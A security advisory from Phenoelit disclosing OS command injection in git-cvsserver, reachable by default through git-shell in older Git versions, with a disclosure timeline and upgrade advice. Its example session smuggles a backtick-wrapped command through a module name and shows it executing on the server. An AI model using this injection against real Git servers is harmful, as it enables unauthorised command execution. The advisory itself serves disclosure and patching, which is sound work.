Git cvsserver Remote Command Execution

Type packetstorm
Reporter joernchen
Modified 2017-09-28T00:00:00


                                            `Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++--->  
[ Authors ]  
joernchen <joernchen () phenoelit de>  
Phenoelit Group (  
[ Affected Products ]  
Git before 2.14.2, 2.13.6, 2.12.5, 2.11.4 and 2.10.5 (git-cvsserver)  
[ Vendor communication ]  
2017-09-08 Sent vulnerability details to the git-security list  
2017-09-09 Acknowledgement of the issue, git maintainers ask if  
a patch could be provided  
2017-09-10 Patch is provided  
2017-09-11 Further backtick operations are patched by the git  
maintainers, corrections on the provided patch  
2017-09-11 Revised patch is sent out  
2017-09-11 Jeff King proposes to drop `git-cvsserver`'s default  
invocation from `git-shell`  
2017-09-22 Draft release for git 2.14.2 is created including the  
2017-09-26 Release of this advisory, release of fixed git versions  
[ Description ]  
The `git` subcommand `cvsserver` is a Perl script which makes excessive  
use of the backtick operator to invoke `git`. Unfortunately user input  
is used within some of those invocations.  
It should be noted, that `git-cvsserver` will be invoked by `git-shell`  
by default without further configuration.  
[ Example ]  
Below a example of a OS Command Injection within `git-cvsserver`  
triggered via `git-shell`:  
[git@host ~]$ cat .ssh/authorized_keys  
command="git-shell -c \"$SSH_ORIGINAL_COMMAND\"" ssh-rsa AAAAB3NzaC ....  
[joernchen@host ~]$ ssh git@localhost cvs server  
Root /tmp  
E /tmp/ does not seem to be a valid GIT repository  
error 1 /tmp/ is not a valid repository  
Directory .  
fatal: Not a git repository: '/tmp/'  
Invalid module '`id>foooooo`' at /usr/lib/git-core/git-cvsserver line 3807, <STDIN> line 4.  
[joernchen@host ~]$  
[git@host ~]$ cat foooooo  
uid=619(git) gid=618(git) groups=618(git)  
[git@host ~]$  
[ Solution ]  
Upgrade to one of the following git versions:  
* 2.14.2  
* 2.13.6  
* 2.12.5  
* 2.11.4  
* 2.10.5  
[ end of file ]